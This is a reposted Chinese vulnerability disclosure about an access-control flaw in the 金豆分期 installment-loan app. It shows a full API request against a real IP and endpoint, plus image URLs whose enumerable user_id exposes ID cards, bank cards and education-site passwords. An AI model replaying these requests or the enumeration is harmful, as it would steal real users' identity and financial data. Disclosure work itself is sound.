神刀安全网

漏洞标题: 金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求个20

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou

下载APP

1.越权问题,APP多接口可越权,并能通过burpsuite遍历获取用户数据

例如

获取用户资料接口

code 区域
POST http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do HTTP/1.1
Content-Length: 203
Content-Type: text/plain; charset=UTF-8
Host: 60.211.217.162:9001
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2 Build/JRO03S) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: JSESSIONID=4360C221EB109302BF98509849CDB560
Cookie2: $Version=1
Accept-Encoding: gzip

{"header":{"device":"Genymotion,Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2,vbox86p","macadd":"123456","platform":"generic,ANDROID,4.1.1"},"request":{"params":{"USER_ID":"110077"},"tokencode":"117386"}}

查看返回数据包涵那些数据(这是user_id=110077的返回数据)

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

由上往下分别是

银行卡号,邮箱,身份证,手机号,还有一个手机验证的密码(不知道用来干啥),学信网账号跟密码

遍历user_id

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

这边只列出银行卡号跟身份证号还有姓名

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

甚至还有用户学信网的账号跟密码

可登陆查看学信档案

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

身份证图片文件未授权访问。同样能遍历

手持身份证图片

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/hold.jpg?time=1461941777435

学生证

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/stucard.jpg?time=1461941777435

身份证图片

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110077/front.jpg?time=1461941777435

同样能遍历,遍历链接中的user_id(上面的userid是110077)

例如

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110048/hold.jpg?time=1461941777435

code 区域
http://60.211.217.162:9001//opt/xydWeb/ArchFiles/upload/FqApiUploadFiles/authPic/110047/hold.jpg?time=1461941777435

全站数据,不是问题

3.紧急联系人越权获取

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

漏洞标题:  金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

同样能遍历,就不演示了

漏洞证明:

修复方案:

加上会话,做好权限控制

给个20Rank吧

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址